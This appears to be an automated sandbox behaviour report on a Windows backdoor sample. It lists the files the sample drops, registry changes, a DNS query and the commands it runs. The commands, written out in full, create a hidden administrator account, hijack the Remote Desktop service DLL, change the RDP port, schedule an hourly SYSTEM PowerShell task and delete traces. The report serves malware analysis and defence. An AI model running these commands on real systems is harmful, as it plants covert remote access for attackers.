Technical Information
To ensure autorun and distribution
Creates or modifies the following files
- <SYSTEM32>\tasks\41030
Creates the following services
- [<HKLM>\system\currentcontrolset\services\TermService\parameters] 'ServiceDLL' = '%WINDIR%\help\tmp5211.dat'
- [<HKLM>\System\CurrentControlSet\Services\TermService] 'Start' = '00000002'
Modifies file system
Creates the following files
- %TEMP%\nspebde.tmp\blowfish.dll
- C:\users\supportaccount\appdata\roaming\microsoft\windows\sendto\fax recipient.lnk
- C:\users\supportaccount\appdata\roaming\microsoft\windows\sendto\desktop.ini
- C:\users\supportaccount\appdata\roaming\microsoft\windows\sendto\desktop (create shortcut).desklink
- C:\users\supportaccount\appdata\roaming\microsoft\windows\sendto\compressed (zipped) folder.zfsendtotarget
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\narrator.lnk
- C:\users\supportaccount\appdata\roaming\microsoft\internet explorer\quick launch\window switcher.lnk
- C:\users\supportaccount\appdata\roaming\microsoft\internet explorer\quick launch\shows desktop.lnk
- <SYSTEM32>\microsoft\protect\s-1-5-20\preferred
- C:\users\supportaccount\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\desktop.ini
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\run.lnk
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\windows explorer.lnk
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\command prompt.lnk
- C:\users\supportaccount\ntuser.ini
- C:\users\supportaccount\appdata\local\microsoft\windows\usrclass.dat.log1
- C:\users\supportaccount\appdata\local\microsoft\windows\usrclass.dat
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\desktop.ini
- C:\users\supportaccount\appdata\roaming\microsoft\windows\sendto\mail recipient.mapimail
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\ease of access.lnk
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\magnify.lnk
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\on-screen keyboard.lnk
- %TEMP%\vbypncxtbhmod.ps1
- %TEMP%\nspebde.tmp\system.dll
- %WINDIR%\help\tmp5211.dat
- %WINDIR%\help\tmp5212.dat
- %WINDIR%\help\tmp5213.dat
- <SYSTEM32>\rfxvmt.dll
- %WINDIR%\temp\usrnm.txt
- C:\users\supportaccount\ntuser.dat.log1
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\notepad.lnk
- <SYSTEM32>\microsoft\protect\s-1-5-20\b750b703-a91c-42a7-9992-67f5e4a8b479
- C:\users\supportaccount\ntuser.dat
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\maintenance\help.lnk
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\maintenance\desktop.ini
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\private character editor.lnk
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\desktop.ini
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\computer.lnk
- C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\control panel.lnk
- %TEMP%\chadshfsd323.txt
- %PROGRAMDATA%\microsoft\crypto\rsa\machinekeys\f686aace6942fb7f7ceb231212eef4a4_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- C:\users\supportaccount\ntuser.pol
Sets the 'hidden' attribute to the following files
- C:\users\supportaccount\ntuser.dat
- C:\users\supportaccount\appdata\local\microsoft\windows\usrclass.dat
Deletes the following files
- %TEMP%\nspebde.tmp\blowfish.dll
- %TEMP%\nspebde.tmp\system.dll
- %TEMP%\chadshfsd323.txt
Deletes itself.
Network activity
UDP
- DNS ASK af####daslfo3d3.xyz
Miscellaneous
Searches for the following windows
- ClassName: 'CicLoaderWndClass' WindowName: ''
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -f %TEMP%\VBYPNCXTBHmod.ps1
- '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -f %TEMP%\VBYPNCXTBHmod.ps1' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe user supportaccount asfggees /del' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe user supportaccount GiFUmPnj /add' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" supportaccount /ADD' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" cvwvjaup$ /ADD' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" supportaccount /ADD' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C net.exe user supportaccount GiFUmPnj' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C schtasks /create /tn 41030 /tr "powershell -nop -ep bypass -f %WINDIR%\help\19196.ps1" /ru system /sc hourly /mo 1' (with hidden window)
Executes the following
- '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -f %TEMP%\VBYPNCXTBHmod.ps1
- '<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" supportaccount /ADD
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" cvwvjaup$ /ADD
- '<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" cvwvjaup$ /ADD
- '<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" cvwvjaup$ /ADD
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" supportaccount /ADD
- '<SYSTEM32>\net.exe' LOCALGROUP "Administrators" supportaccount /ADD
- '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" supportaccount /ADD
- '<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" supportaccount /ADD
- '<SYSTEM32>\net1.exe' LOCALGROUP "Administrators" supportaccount /ADD
- '<SYSTEM32>\net1.exe' user supportaccount GiFUmPnj
- '<SYSTEM32>\cmd.exe' /C schtasks /create /tn 41030 /tr "powershell -nop -ep bypass -f %WINDIR%\help\19196.ps1" /ru system /sc hourly /mo 1
- '<SYSTEM32>\schtasks.exe' /create /tn 41030 /tr "powershell -nop -ep bypass -f %WINDIR%\help\19196.ps1" /ru system /sc hourly /mo 1
- '<SYSTEM32>\smss.exe' 00000000 0000003c
- '<SYSTEM32>\csrss.exe' ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitializa...
- '<SYSTEM32>\winlogon.exe'
- '<SYSTEM32>\cmd.exe' /C net.exe user supportaccount GiFUmPnj
- '<SYSTEM32>\net.exe' user supportaccount GiFUmPnj
- '<SYSTEM32>\cmd.exe' /c del %temp%\*.txt /f
- '<SYSTEM32>\cmd.exe' /c del %temp%\*.ps1 /f
- '<SYSTEM32>\net1.exe' user supportaccount GiFUmPnj /add
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /inheritance:d
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /remove BUILTIN\Administrators
- '<SYSTEM32>\icacls.exe' rfxvmt.dll /grant BUILTIN\Administrators:RX
- '<SYSTEM32>\takeown.exe' /A /F rfxvmt.dll
- '<SYSTEM32>\reg.exe' ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
- '<SYSTEM32>\net.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
- '<SYSTEM32>\net1.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
- '<SYSTEM32>\cmd.exe' /C net.exe user supportaccount asfggees /del
- '<SYSTEM32>\net.exe' user supportaccount asfggees /del
- '<SYSTEM32>\net1.exe' user supportaccount asfggees /del
- '<SYSTEM32>\cmd.exe' /C net.exe user supportaccount GiFUmPnj /add
- '<SYSTEM32>\net.exe' user supportaccount GiFUmPnj /add
- '<SYSTEM32>\reg.exe' add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %WINDIR%\help\tmp5211.dat /f
- '<SYSTEM32>\gpscript.exe' /RefreshSystemParam
- '<SYSTEM32>\rdpclip.exe'
Attempts to shut down the Windows operating system.
